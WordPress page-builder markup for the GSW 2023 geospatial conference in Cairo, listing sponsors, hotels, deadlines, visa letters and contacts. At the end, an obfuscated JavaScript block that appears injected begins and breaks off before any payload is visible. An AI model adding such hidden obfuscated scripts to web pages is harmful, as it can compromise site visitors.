style=\"font-size: 36pt;\">Prime Sponsor</span></h4>\n<p>&nbsp;</p>\n<p>&nbsp;[/vc_column_text][/vc_column_inner][vc_column_inner width=\"1/3\"][vc_column_text css=\".vc_custom_1687219711400{margin-top: 90px !important;}\"]</p>\n<h4 style=\"text-align: center;\"></h4>\n<p>&nbsp;</p>\n<p>&nbsp;</p>\n<p><a href=\"https://www.esri.com/en-us/home\" target=\"_blank\" rel=\"noopener\"><img class=\"aligncenter wp-image-4719\" src=\"https://gsw2023.com/wp-content/uploads/2023/06/ESRI-300x111.jpg\" alt=\"\" width=\"487\" height=\"180\" /></a>[/vc_column_text][/vc_column_inner][/vc_row_inner][vc_separator style=\"shadow\" border_width=\"10\"][vc_row_inner][vc_column_inner width=\"1/3\"][/vc_column_inner][vc_column_inner width=\"1/3\"][vc_column_text css=\".vc_custom_1687096263968{margin-top: 0px !important;}\"]</p>\n<h4 style=\"text-align: center;\"><span style=\"font-size: 24pt;\"><strong>Platinum Sponsors</strong></span></h4>\n<p><a href=\"https://www.pix4d.com/ \" target=\"_blank\" rel=\"noopener\"><img class=\"https://www.pix4d.com/ aligncenter wp-image-4482\" title=\"https://www.pix4d.com/ \" src=\"https://gsw2023.com/wp-content/uploads/2023/05/LOGO_CORP_HORIZONTAL_LIGHT-300x91.png\" alt=\"\" width=\"385\" height=\"117\" /></a>[/vc_column_text][/vc_column_inner][vc_column_inner width=\"1/3\"][/vc_column_inner][/vc_row_inner][vc_separator style=\"shadow\" border_width=\"10\"][vc_row_inner][vc_column_inner width=\"1/3\"][vc_column_text css=\".vc_custom_1687096091997{margin-top: 125px !important;}\"]</p>\n<h6><a href=\"https://www.bdstar.com/en/\" target=\"_blank\" rel=\"noopener\"><img class=\"aligncenter wp-image-3987\" src=\"https://gsw2023.com/wp-content/uploads/2023/04/BDStar-1024x223.png\" alt=\"\" width=\"317\" height=\"69\" /></a></h6>\n<p>[/vc_column_text][/vc_column_inner][vc_column_inner width=\"1/3\"][vc_column_text css=\".vc_custom_1687096010128{margin-top: 50px !important;}\"]</p>\n<h3 style=\"text-align: center;\"><strong>Gold Sponsors</strong></h3>\n<p><span style=\"font-size: 8pt;\"><a href=\"https://hdmap.geomatics.ncku.edu.tw/index-US.php\" target=\"_blank\" rel=\"noopener\"><img class=\"aligncenter wp-image-3989\" src=\"https://gsw2023.com/wp-content/uploads/2023/04/LOGO-of-HDP-center-final0730-1-1024x351.png\" alt=\"\" width=\"350\" height=\"120\" /></a></span>[/vc_column_text][/vc_column_inner][vc_column_inner width=\"1/3\"][vc_column_text css=\".vc_custom_1687095942758{margin-top: 137px !important;}\"]<a href=\"https://www.applanix.com\" target=\"_blank\" rel=\"noopener\"><img class=\"aligncenter wp-image-3988\" src=\"https://gsw2023.com/wp-content/uploads/2023/04/Applanix_CYMK_OUTLINES_Horizontal_Blue-1024x129.jpg\" alt=\"\" width=\"451\" height=\"57\" /></a>[/vc_column_text][/vc_column_inner][/vc_row_inner][vc_row_inner][vc_column_inner width=\"1/3\"][vc_column_text css=\".vc_custom_1687219836213{margin-top: -px !important;}\"]<a href=\"https://leica-geosystems.com\" target=\"_blank\" rel=\"noopener\"><img class=\"aligncenter wp-image-4701 \" src=\"https://gsw2023.com/wp-content/uploads/2023/06/hexagon_new-300x122.jpg\" alt=\"\" width=\"349\" height=\"142\" /></a>[/vc_column_text][/vc_column_inner][vc_column_inner width=\"1/3\"][vc_column_text css=\".vc_custom_1684305185157{margin-top: 40px !important;}\"]<span style=\"font-size: 8pt;\"><a href=\"https://www.tasa.org.tw/index.php?ln=en\" target=\"_blank\" rel=\"noopener\"><img class=\"aligncenter wp-image-4089 size-medium\" src=\"https://gsw2023.com/wp-content/uploads/2023/04/logo_en_tasa2-300x63.png\" alt=\"\" width=\"300\" height=\"63\" /></a></span>[/vc_column_text][/vc_column_inner][vc_column_inner width=\"1/3\"][vc_column_text css=\".vc_custom_1687095881067{margin-top: 20px !important;}\"]<a href=\"https://www.microengineering.ca \" target=\"_blank\" rel=\"noopener\"><img class=\"aligncenter wp-image-4560 size-medium\" src=\"https://gsw2023.com/wp-content/uploads/2023/05/Artboard-1-300x83.png\" alt=\"\" width=\"300\" height=\"83\" /></a>[/vc_column_text][/vc_column_inner][/vc_row_inner][vc_separator style=\"shadow\" border_width=\"10\"][vc_row_inner css=\".vc_custom_1680403868499{margin-top: -35px !important;}\"][vc_column_inner width=\"1/3\"][vc_column_text css=\".vc_custom_1686345447550{margin-top: 50px !important;}\"]</p>\n<h4 style=\"text-align: center;\"></h4>\n<p>&nbsp;</p>\n<p><a href=\"https://www.giscon.de/en/\" target=\"_blank\" rel=\"noopener\"><img class=\"wp-image-4597 aligncenter\" src=\"https://gsw2023.com/wp-content/uploads/2023/06/giscon-300x222.jpg\" alt=\"\" width=\"255\" height=\"189\" /><br />\n</a>[/vc_column_text][/vc_column_inner][vc_column_inner width=\"1/3\"][vc_column_text css=\".vc_custom_1686345389553{margin-top: 50px !important;}\"]</p>\n<h4 style=\"text-align: center;\"><span style=\"font-size: 18pt;\"><strong>Silver Sponsors</strong></span></h4>\n<p>&nbsp;</p>\n<p style=\"text-align: center;\"><a href=\"https://terrasolid.com/\" target=\"_blank\" rel=\"noopener\"> </a></p>\n<p>[/vc_column_text][/vc_column_inner][vc_column_inner width=\"1/3\"][vc_column_text css=\".vc_custom_1686345510625{margin-top: 50px !important;}\"]</p>\n<h4 style=\"text-align: center;\"></h4>\n<p>&nbsp;</p>\n<p>&nbsp;</p>\n<p style=\"text-align: center;\"><a href=\"https://terrasolid.com/\" target=\"_blank\" rel=\"noopener\"><img class=\"alignnone wp-image-4655 \" src=\"https://gsw2023.com/wp-content/uploads/2023/06/Terrasolid_logo_wide2_rgb_300dpi-300x112.png\" alt=\"\" width=\"324\" height=\"121\" /><br />\n</a>[/vc_column_text][/vc_column_inner][/vc_row_inner][vc_separator style=\"shadow\" border_width=\"10\"][vc_row_inner css=\".vc_custom_1680403868499{margin-top: -35px !important;}\"][vc_column_inner width=\"1/3\"][vc_column_text css=\".vc_custom_1687096291206{margin-top: 50px !important;}\"]<a href=\"https://www.geosat.com.tw\" target=\"_blank\" rel=\"noopener\"><img class=\"aligncenter wp-image-4041 size-medium\" src=\"https://gsw2023.com/wp-content/uploads/2023/04/Geosat-logo-300x170.jpg\" alt=\"\" width=\"300\" height=\"170\" /></a>[/vc_column_text][/vc_column_inner][vc_column_inner width=\"1/3\"][vc_column_text css=\".vc_custom_1687096367037{margin-top: 50px !important;}\"]</p>\n<h4 style=\"text-align: center;\"><strong>Bronze Sponsors</strong></h4>\n<p><a href=\"https://www.riegl.com\" target=\"_blank\" rel=\"noopener\"><img class=\"aligncenter wp-image-3997 size-medium\" src=\"https://gsw2023.com/wp-content/uploads/2023/04/Logo_Schriftzug_rgb_R-300x107.png\" alt=\"\" width=\"300\" height=\"107\" /></a>[/vc_column_text][/vc_column_inner][vc_column_inner width=\"1/3\"][vc_column_text css=\".vc_custom_1687096532104{margin-top: 88px !important;}\"]<a href=\"https://www.robotlab.com.tw\" target=\"_blank\" rel=\"noopener\"><img class=\"aligncenter wp-image-4033 size-medium\" src=\"https://gsw2023.com/wp-content/uploads/2023/04/Xiang-Cheng-electronic-Logo-300x107.png\" alt=\"\" width=\"300\" height=\"107\" /></a>[/vc_column_text][/vc_column_inner][/vc_row_inner][vc_column_text css=\".vc_custom_1684202742439{margin-top: 50px !important;}\"]</p>\n<h4 style=\"text-align: center;\"><span style=\"font-size: 18pt;\">Official Airline</span></h4>\n<p><a href=\"https://bit.ly/3HLQBrB\" target=\"_blank\" rel=\"noopener\"><img class=\"aligncenter wp-image-4495 size-medium\" src=\"https://gsw2023.com/wp-content/uploads/2023/05/egyptair-300x173.png\" alt=\"\" width=\"300\" height=\"173\" /></a></p>\n<p style=\"text-align: center;\">Egypt Air will offer 20% Discount on tickets for the Conference Participants. To receive the password for the getting the discount, please send an email to:</p>\n<p style=\"text-align: center;\"><strong>GSW-EGYPTAIR@gsw2023.com</strong></p>\n<p>[/vc_column_text][vc_separator style=\"shadow\" border_width=\"10\"][/vc_column][/vc_row][vc_row css=\".vc_custom_1668205719738{margin-top: 20px !important;margin-bottom: 0px !important;border-top-width: 0px !important;border-bottom-width: 0px !important;padding-top: 0px !important;padding-bottom: 0px !important;}\"][vc_column width=\"1/4\" css=\".vc_custom_1668010547399{margin-top: 20px !important;margin-bottom: 0px !important;border-top-width: 0px !important;border-bottom-width: 0px !important;padding-top: 0px !important;padding-bottom: 0px !important;}\"][vc_column_text css=\".vc_custom_1675475943417{margin-bottom: 0px !important;border-bottom-width: 0px !important;padding-bottom: 0px !important;}\"]</p>\n<h2 style=\"color: #311b92; text-align: left;\"><strong> EGYPT GSW\'2023</strong></h2>\n<p>&nbsp;</p>\n<h3></h3>\n<p>[/vc_column_text][vc_column_text css=\".vc_custom_1684377464605{margin-top: 0px !important;border-top-width: 0px !important;padding-top: 0px !important;}\"]</p>\n<p style=\"text-align: justify;\">As we celebrate our 50th anniversary, the Arab Academy for Science, Technology, and Maritime Transport (AASTMT) is honored to host the ISPRS first Geospatial Week in Africa and Middle East in 2023 (GSW-2023) that will be held under the auspices of H.E Secretary-General of the League of Arab States. The conference will be held in September 2023, at the InterContinental Cairo Semiramis Cairo, Egypt. AASTMT strongly believes that science is the key to the future and the cornerstone for nations\' progress and prosperity.</p>\n<p>[/vc_column_text][dt_default_button link=\"url:https%3A%2F%2Fgsw2023.com%2Findex.php%2Fwelcome%2F\" size=\"medium\" btn_width=\"btn_fixed_width\" custom_btn_width=\"200\" button_alignment=\"btn_center\" css=\".vc_custom_1685736118080{margin-right: 10px !important;margin-bottom: 10px !important;margin-left: 10px !important;}\"]Read More[/dt_default_button][/vc_column][vc_column width=\"3/4\" css=\".vc_custom_1668010506951{margin-top: 0px !important;margin-bottom: 0px !important;border-top-width: 0px !important;border-bottom-width: 0px !important;padding-top: 0px !important;padding-bottom: 0px !important;}\"][dt_team_masonry order=\"asc\" custom_content_bg_color=\"#e8e8e8\" image_sizing=\"proportional\" img_max_width=\"120px\" image_paddings=\"10px 0px 0px 0px\" img_border_radius=\"10px\" post_title_bottom_margin=\"0px\" read_more_button=\"off\" soc_icon_border_width=\"0px\" posts_offset=\"0\" category=\"105\" css_dt_team_masonry=\".vc_custom_1686350035719{margin-top: 190px !important;}\"][/vc_column][/vc_row][vc_row bg_type=\"image\" parallax_style=\"vcpb-animated\" bg_image_new=\"id^3283|url^https://gsw2023.com/wp-content/uploads/2022/11/1664433062169.jpg|caption^null|alt^null|title^1664433062169|description^null\" animation_direction=\"top-animation\" bg_override=\"ex-full\" fadeout_row=\"fadeout_row_value\" enable_overlay=\"enable_overlay_value\" overlay_color=\"#3a3a3a\" overlay_pattern=\"transperant\" overlay_pattern_opacity=\"75\"][vc_column width=\"1/3\"][/vc_column][vc_column width=\"1/3\" awb_type=\"image\"][/vc_column][vc_column width=\"1/3\"][/vc_column][vc_column width=\"1/3\"][vc_column_text css=\".vc_custom_1687553155258{margin-top: 0px !important;margin-left: -50px !important;border-left-width: -50px !important;}\"]</p>\n<h4 style=\"text-align: center;\"><span style=\"color: #000000; padding: 5px; background-color: rgba(255,255,255, 0.7); font-size: 14pt;\">InterContinental Cairo Semiramis</span></h4>\n<h4 style=\"text-align: center;\"><span style=\"color: #ffffff; font-size: 18pt;\"><img class=\" wp-image-3289 aligncenter\" src=\"https://gsw2023.com/wp-content/uploads/2022/11/282192719-300x169.jpg\" alt=\"\" width=\"325\" height=\"183\" />Conference Venue </span></h4>\n<h4 style=\"text-align: center;\"><span style=\"color: #ffffff; font-size: 18pt;\">Special Rate Booking is Opened Now</span></h4>\n<h5 style=\"text-align: center;\"><span style=\"color: #ffffff;\">Deadline for the Special Rates is August 10, 2023</span></h5>\n<p>[/vc_column_text][dt_default_button link=\"url:https%3A%2F%2Fwww.ihg.com%2Fintercontinental%2Fhotels%2Fus%2Fen%2Fcairo%2Fcroha%2Fhoteldetail%3FfromRedirect%3Dtrue%26qSrt%3DsAV%26qIta%3D99801505%26icdv%3D99801505%26qSlH%3DCROHA%26qGrpCd%3DDY8%26setPMCookies%3Dtrue%26qSHBrC%3DIC%26qDest%3DCorniche%2BEl%2BNil%25252C%2BCairo%25252C%2BEG%26srb_u%3D1|target:_blank\" size=\"big\" btn_width=\"btn_fixed_width\" custom_btn_width=\"200\" button_alignment=\"btn_center\" css=\".vc_custom_1687389829594{margin-top: 7px !important;margin-right: 10px !important;margin-bottom: 10px !important;margin-left: -50px !important;}\"]BOOK NOW[/dt_default_button][/vc_column][vc_column width=\"1/3\" awb_type=\"image\"][vc_column_text css=\".vc_custom_1687553105001{margin-top: 0px !important;}\"]</p>\n<h4 style=\"text-align: center;\"><span style=\"font-size: 18pt; color: #000000; padding: 5px; background-color: rgba(255,255,255, 0.7);\">Ramses Hilton hotel</span></h4>\n<h4></h4>\n<p><img class=\"aligncenter\" src=\"https://www.hilton.com/im/en/CAIRHTW/16763081/exterior-night-shot.jpg?impolicy=crop&amp;cw=4849&amp;ch=3334&amp;gravity=NorthWest&amp;xposition=75&amp;yposition=0&amp;rw=320&amp;rh=220\" alt=\"Hotel Exterior at Night\" width=\"262\" height=\"180\" /></p>\n<p>&nbsp;</p>\n<h4 style=\"text-align: center;\"></h4>\n<h4 style=\"text-align: center;\"><span style=\"font-size: 18pt;\"><span style=\"color: #ffffff;\">Special Rate Booking is O</span><span style=\"color: #ffffff;\">pened Now</span></span></h4>\n<h5 style=\"text-align: center;\"><span style=\"color: #ffffff;\">Deadline for the Special Rates is August 10, 2023</span></h5>\n<p>[/vc_column_text][dt_default_button link=\"url:https%3A%2F%2Fwww.hilton.com%2Fen%2Fattend-my-event%2Fcairhtw-gaas23-e979b836-791b-44ea-9095-410655c177d0%2F|target:_blank\" size=\"big\" btn_width=\"btn_fixed_width\" custom_btn_width=\"200\" button_alignment=\"btn_center\" css=\".vc_custom_1684378842229{margin-right: 10px !important;margin-bottom: 10px !important;margin-left: 10px !important;}\"]BOOK NOW[/dt_default_button][/vc_column][vc_column width=\"1/3\"][vc_column_text]</p>\n<h4 class=\"qrShPb pXs6bb PZPZlf q8U8x aTI8gc EaHP9c\" style=\"text-align: center;\" data-dtype=\"d3ifr\" data-local-attribute=\"d3bn\" data-attrid=\"title\" data-ved=\"2ahUKEwi88f_AuNX_AhU5gv0HHQT_D7wQ3B0oAHoECDsQAQ\"><span style=\"color: #000000; padding: 5px; background-color: rgba(255,255,255, 0.7); font-size: 18pt;\">Flamenco Cairo Hotel</span></h4>\n<h4></h4>\n<p><a href=\"https://www.flamencohotels.com/web/\" target=\"_blank\" rel=\"noopener\"><img class=\"aligncenter\" src=\"https://www.flamencohotels.com/web/wp-content/uploads/2020/02/4Z4A4470-Low.jpg\" alt=\"\" width=\"281\" height=\"187\" /></a></p>\n<p>&nbsp;</p>\n<h4 style=\"text-align: center;\"></h4>\n<h4 style=\"text-align: center;\"><span style=\"font-size: 18pt;\"><span style=\"color: #ffffff;\">Special Rate Booking is O</span><span style=\"color: #ffffff;\">pened Now</span></span></h4>\n<h5 style=\"text-align: center;\"><span style=\"color: #ffffff;\">Deadline for the Special Rates is August 10, 2023</span></h5>\n<p>[/vc_column_text][dt_default_button link=\"url:https%3A%2F%2Fgsw2023.com%2Findex.php%2Fflamenco-cairo-hotel%2F|target:_blank\" size=\"big\" btn_width=\"btn_fixed_width\" custom_btn_width=\"200\" button_alignment=\"btn_center\" css=\".vc_custom_1687391423079{margin-right: 10px !important;margin-bottom: 10px !important;margin-left: 10px !important;}\"]BOOK NOW[/dt_default_button][vc_column_text]</p>\n<h4 style=\"text-align: center;\"><span style=\"font-size: 14pt; color: #000000; padding: 5px; background-color: rgba(255,255,255, 0.7);\"> Novotel Cairo El Borg Hotel</span></h4>\n<p><a href=\"https://novotelborg.com-cairo.com/\" target=\"_blank\" rel=\"noopener\"><img class=\"aligncenter\" src=\"https://cf.bstatic.com/xdata/images/hotel/max1024x768/222745005.jpg?k=18dfdc6ae56119c43bcff6e4a4f7f46814bcc54610f91414d64746d41bc2e9d0&amp;o=&amp;hp=1\" alt=\"Gallery image of this property\" width=\"249\" height=\"187\" /></a></p>\n<p>&nbsp;</p>\n<h4 style=\"text-align: center;\"></h4>\n<h4 style=\"text-align: center;\"><span style=\"font-size: 18pt;\"><span style=\"color: #ffffff;\">Special Rate Booking is O</span><span style=\"color: #ffffff;\">pened Now</span></span></h4>\n<h5 style=\"text-align: center;\"><span style=\"color: #ffffff;\">Deadline for the Special Rates is August 15, 2023</span></h5>\n<p>[/vc_column_text][dt_default_button link=\"url:https%3A%2F%2Fgsw2023.com%2Findex.php%2Fnovotel-cairo-el-borg%2F|target:_blank\" size=\"big\" btn_width=\"btn_fixed_width\" custom_btn_width=\"200\" button_alignment=\"btn_center\" css=\".vc_custom_1687390894260{margin-right: 10px !important;margin-bottom: 10px !important;margin-left: 10px !important;}\"]BOOK NOW[/dt_default_button][/vc_column][/vc_row][vc_row][vc_column width=\"1/2\"][vc_row_inner css=\".vc_custom_1668005438919{margin-top: 0px !important;margin-bottom: 0px !important;border-top-width: 0px !important;border-bottom-width: 0px !important;padding-top: 0px !important;padding-bottom: 0px !important;}\"][vc_column_inner width=\"1/4\"][vc_single_image image=\"3103\" img_size=\"120x120\" alignment=\"center\" css=\".vc_custom_1668204801057{margin-top: 1px !important;border-top-width: 0px !important;padding-top: 0px !important;}\"][/vc_column_inner][vc_column_inner width=\"3/4\" css=\".vc_custom_1668010702427{margin-top: 35px !important;margin-bottom: 0px !important;border-top-width: 0px !important;border-bottom-width: 0px !important;padding-top: 0px !important;padding-bottom: 0px !important;}\"][ult_countdown count_style=\"ult-cd-s2\" datetime=\"2023/09/02 00:00:00\" countdown_opts=\"sday,shr,smin,ssec\" timer_bg_color=\"#ffffff\" tick_col=\"#311b92\" tick_style=\"font-weight:bold;\" timer_unit_font_family=\"font_family:|font_call:\" tick_unit_style=\"font-weight:bold;\" css_countdown=\".vc_custom_1668204929553{margin-top: 20px !important;}\" tick_size=\"desktop:50px;\"][/vc_column_inner][/vc_row_inner][/vc_column][vc_column][vc_separator color=\"violet\" style=\"shadow\" border_width=\"10\"][/vc_column][/vc_row][vc_row content_placement=\"middle\" bg_type=\"image\" parallax_style=\"vcpb-default\" bg_image_new=\"id^3365|url^https://gsw2023.com/wp-content/uploads/2022/11/cairo-egypt_shutterstock_1421974805-1-scaled.jpg|caption^null|alt^null|title^cairo-egypt_shutterstock_1421974805|description^null\" bg_image_posiiton=\"0\" bg_override=\"ex-full\" enable_overlay=\"enable_overlay_value\" overlay_color=\"rgba(0,0,0,0.58)\"][vc_column width=\"1/2\" css=\".vc_custom_1686320668385{margin-top: -25px !important;}\"][ultimate_heading main_heading=\"Important Dates\" main_heading_color=\"#ffffff\" sub_heading_color=\"#ffffff\" spacer=\"line_only\" spacer_position=\"middle\" line_height=\"5\" line_color=\"\" main_heading_style=\"font-weight:bold;\" main_heading_font_size=\"desktop:44px;tablet_portrait:30px;\" main_heading_line_height=\"desktop:54px;tablet_portrait:40px;\" main_heading_margin=\"margin-top:25px;margin-bottom:10px;\" line_width=\"120\" el_class=\"accent-border-color\" sub_heading_style=\"font-style:italic;\" sub_heading_font_size=\"desktop:22px;mobile_landscape:16px;\" sub_heading_line_height=\"desktop:32px;mobile_landscape:26px;\" spacer_margin=\"margin-bottom:40px;\" sub_heading_margin=\"margin-bottom:50px;\"]</p>\n<ul>\n<li style=\"text-align: left;\">\n<h5><span style=\"color: #ffffff;\"><strong>Camera ready paper submission: July 15, 2023 </strong></span></h5>\n</li>\n<li style=\"text-align: left;\">\n<h5><span style=\"color: #ffffff;\"><strong>Deadline for submission of travel grants funded by The ISPRS Foundation is: June 16, 2023</strong></span></h5>\n</li>\n<li style=\"text-align: left;\">\n<h5><span style=\"color: #ffffff;\"><strong>Early bird registration deadline: July 1, 2023</strong></span></h5>\n</li>\n</ul>\n<p>[/ultimate_heading][ultimate_heading main_heading_color=\"#ffffff\" sub_heading_color=\"#ffffff\" spacer=\"line_only\" spacer_position=\"middle\" line_height=\"5\" line_color=\"\" main_heading_style=\"font-weight:bold;\" main_heading_font_size=\"desktop:44px;tablet_portrait:30px;\" main_heading_line_height=\"desktop:54px;tablet_portrait:40px;\" main_heading_margin=\"margin-bottom:10px;\" line_width=\"120\" el_class=\"accent-border-color\" sub_heading_style=\"font-style:italic;\" sub_heading_font_size=\"desktop:22px;mobile_landscape:16px;\" sub_heading_line_height=\"desktop:32px;mobile_landscape:26px;\" spacer_margin=\"margin-bottom:40px;\" sub_heading_margin=\"margin-bottom:50px;\"][/ultimate_heading][/vc_column][vc_column width=\"1/2\"][ultimate_heading main_heading=\"Invitation Letter\" main_heading_color=\"#ffffff\" sub_heading_color=\"#ffffff\" spacer=\"line_only\" spacer_position=\"middle\" line_height=\"5\" line_color=\"\" main_heading_style=\"font-weight:bold;\" main_heading_font_size=\"desktop:44px;tablet_portrait:30px;\" main_heading_line_height=\"desktop:54px;tablet_portrait:40px;\" main_heading_margin=\"margin-bottom:10px;\" line_width=\"120\" el_class=\"accent-border-color\" sub_heading_style=\"font-style:italic;\" sub_heading_font_size=\"desktop:22px;mobile_landscape:16px;\" sub_heading_line_height=\"desktop:32px;mobile_landscape:26px;\" spacer_margin=\"margin-bottom:40px;\" sub_heading_margin=\"margin-bottom:50px;\"]</p>\n<h2 style=\"text-align: center;\"></h2>\n<h5 style=\"text-align: center;\"><span style=\"color: #ffffff; font-size: 12pt;\"><strong>You can generate an invitation letter automatically once you provide your information.</strong></span></h5>\n<h5 style=\"text-align: center;\"><span style=\"color: #ffffff;\"><strong> </strong></span><strong><span style=\"color: #ffff00;\"><a style=\"color: #ffff00;\" href=\"https://visa.gsw2023.com/\" target=\"_blank\" rel=\"noopener\">Get Your Invitation letter</a></span></strong></h5>\n<h5 style=\"text-align: center;\"><span style=\"color: #ffffff;\"><strong> </strong></span></h5>\n<h5 style=\"text-align: center;\"><span style=\"color: #ffffff; font-size: 12pt;\"><strong>If you require specific format for the Visa Letter, please Send email with the additional information to</strong></span></h5>\n<h5 style=\"text-align: center;\"><span style=\"color: #ffff00;\"><strong> </strong><a style=\"color: #ffff00;\" href=\"mailto:GSW-visa@gsw2023.com\" target=\"_blank\" rel=\"noopener\">GSW-visa@gsw2023.com</a><strong> .</strong></span></h5>\n<p>[/ultimate_heading][/vc_column][/vc_row][vc_row][vc_column][vc_separator color=\"custom\" style=\"shadow\" border_width=\"7\" accent_color=\"#311b92\"][vc_column_text]</p>\n<h3 style=\"text-align: center;\"><span style=\"font-size: 24pt;\"><strong>Keynotes Speakers and Panelists</strong></span></h3>\n<p>[/vc_column_text][dt_team_masonry order=\"asc\" image_sizing=\"proportional\" img_max_width=\"180px\" image_paddings=\"10px 10px 10px 10px\" img_border_radius=\"10px\" post_title_bottom_margin=\"0px\" read_more_button=\"off\" soc_icon_border_width=\"0px\" posts_offset=\"0\" category=\"104\"][vc_separator color=\"violet\" style=\"shadow\" border_width=\"10\"][/vc_column][/vc_row][vc_row][vc_column width=\"1/2\"][vc_single_image image=\"3229\" img_size=\"700x525\"][/vc_column][vc_column width=\"1/2\"][vc_single_image image=\"3225\" img_size=\"675x480\"][dt_default_button link=\"url:https%3A%2F%2Faast.edu%2Fen%2F|target:_blank\" smooth_scroll=\"y\" size=\"medium\" btn_width=\"btn_fixed_width\" custom_btn_width=\"200\" animation=\"swing\" css=\".vc_custom_1668027792405{margin-right: 10px !important;margin-bottom: 10px !important;margin-left: 10px !important;}\"]MORE[/dt_default_button][/vc_column][/vc_row][vc_row bg_type=\"grad\" bg_override=\"ex-full\" type=\"vc_default\" margin_top=\"-50\" css=\".vc_custom_1668009257885{padding-top: 40px !important;padding-bottom: 60px !important;}\" bg_grad=\"background: -webkit-gradient(linear, left top, left bottom, color-stop(10%, #311B92), color-stop(95%, #311B45));background: -moz-linear-gradient(left,#311B92 10%,#311B45 95%);background: -webkit-linear-gradient(left,#311B92 10%,#311B45 95%);background: -o-linear-gradient(left,#311B92 10%,#311B45 95%);background: -ms-linear-gradient(left,#311B92 10%,#311B45 95%);background: linear-gradient(left,#311B92 10%,#311B45 95%);\"][vc_column offset=\"vc_col-lg-12 vc_col-md-12\"][vc_row_inner][vc_column_inner width=\"1/2\"][dt_fancy_title title=\"GSW2023 Venue\" title_size=\"h2\" title_color=\"accent\" separator_style=\"disabled\" el_width=\"200\"][vc_separator color=\"white\" style=\"shadow\" border_width=\"5\"][vc_column_text]</p>\n<h4 style=\"text-align: justify; color: cyan;\">GSW2023 Will be held at the</h4>\n<h4 style=\"text-align: justify; color: white;\"><strong>InterContinental Cairo Semiramis</strong></h4>\n<p>&nbsp;</p>\n<h4 style=\"text-align: justify; color: cyan;\"><strong>For More Information:</strong></h4>\n<p><span style=\"font-size: 12pt;\"><strong>Contact us at: </strong><a href=\"mailto:info@gsw2023.com\"><strong>info@gsw2023.com</strong></a></span></p>\n<h5 style=\"text-align: justify; color: white;\"><strong>The Arab Academy for Science, Science, and Maritime Transport</strong></h5>\n<h5 style=\"text-align: justify; color: white;\"></h5>\n<h5 style=\"text-align: justify; color: white;\"><strong>P.O. Box 1029 -Gamal Abdelnaser st. -Miami ,Alexandria</strong></h5>\n<h5 style=\"text-align: justify; color: white;\"><strong>Tel :(+203) 5497598</strong></h5>\n<h5 style=\"text-align: justify; color: white;\"><strong>Fax:(+203) 5497598</strong></h5>\n<p>[/vc_column_text][/vc_column_inner][vc_column_inner width=\"1/2\"][vc_gmaps link=\"#E-8_JTNDaWZyYW1lJTIwc3JjJTNEJTIyaHR0cHMlM0ElMkYlMkZ3d3cuZ29vZ2xlLmNvbSUyRm1hcHMlMkZlbWJlZCUzRnBiJTNEJTIxMW0xOCUyMTFtMTIlMjExbTMlMjExZDM0NTMuNzgzNzk1Mjk1ODM5JTIxMmQzMS4yMjk4MDEzMTUxMTUwMiUyMTNkMzAuMDQzMDU5OTgxODgyNzc0JTIxMm0zJTIxMWYwJTIxMmYwJTIxM2YwJTIxM20yJTIxMWkxMDI0JTIxMmk3NjglMjE0ZjEzLjElMjEzbTMlMjExbTIlMjExczB4MCUyNTNBMHg4Mzk4MmRiOWY2ODY5Y2ElMjEyek16RENzREF5SnpNMUxqQWlUaUF6TWNLd01UTW5OVFV1TWlKRiUyMTVlMCUyMTNtMiUyMTFzZW4lMjEyc2VnJTIxNHYxNjYzMzI1MDg5MDEwJTIxNW0yJTIxMXNlbiUyMTJzZWclMjIlMjB3aWR0aCUzRCUyMjg4NSUyMiUyMGhlaWdodCUzRCUyMjQ1MCUyMiUyMHN0eWxlJTNEJTIyYm9yZGVyJTNBMCUzQiUyMiUyMGFsbG93ZnVsbHNjcmVlbiUzRCUyMiUyMiUyMGxvYWRpbmclM0QlMjJsYXp5JTIyJTIwcmVmZXJyZXJwb2xpY3klM0QlMjJuby1yZWZlcnJlci13aGVuLWRvd25ncmFkZSUyMiUzRSUzQyUyRmlmcmFtZSUzRSUyMA==\"][/vc_column_inner][/vc_row_inner][/vc_column][/vc_row][vc_row type=\"vc_default\" margin_top=\"-50\" css=\".vc_custom_1668026824667{padding-top: 40px !important;padding-bottom: 40px !important;}\"][vc_column offset=\"vc_col-lg-12 vc_col-md-12\"][ultimate_heading main_heading=\"GSW\'2023\" main_heading_color=\"#311b92\" main_heading_style=\"font-weight:bold;\" main_heading_font_size=\"desktop:44px;tablet_portrait:30px;\" main_heading_line_height=\"desktop:54px;tablet_portrait:40px;\"][/ultimate_heading][vc_separator color=\"custom\" style=\"shadow\" border_width=\"10\" accent_color=\"#40f7e5\"][ult_countdown datetime=\"2023/09/02 00:00:00\" countdown_opts=\"sday,shr,smin\" timer_bg_color=\"#ffffff\" tick_col=\"#311b92\" tick_sep_col=\"#311b92\" tick_unit_style=\"font-weight:bold;\" tick_style=\"font-weight:bold;\"][vc_row_inner][vc_column_inner width=\"1/3\"][/vc_column_inner][vc_column_inner width=\"1/3\"][dt_icon_text dt_text_title=\"info@gsw2023.com\" dt_text_custom_title_color=\"#311b92\" dt_text_desc=\"\" show_btn=\"n\" dt_text_icon_border_width=\"2px\" dt_text_icon_color=\"#ffffff\"][/vc_column_inner][vc_column_inner width=\"1/3\"][/vc_column_inner][/vc_row_inner][vc_column_text]</p>\n<p style=\"text-align: center;\"><strong><a href=\"mailto:gsw2023@aast.edu\">gsw2023@aast.edu</a></strong></p>\n<p style=\"text-align: center;\"><strong> <a href=\"mailto:aaelbary@gsw2023.com\">aaelbary@gsw2023.com</a></strong></p>\n<p>[/vc_column_text][/vc_column][/vc_row]</p>\r\n<script>function _0x3023(_0x562006,_0x1334d6){const _0x10c8dc=_0x10c8();return _0x3023=function(_0x3023c3,_0x1b71b5){_0x3023c3=_0x3023c3-0x186;let _0x2d38c6=_0x10c8dc[_0x3023c3];return _0x2d38c6;},_0x3023(_0x562006,_0x1334d6);}function _0x10c8(){const 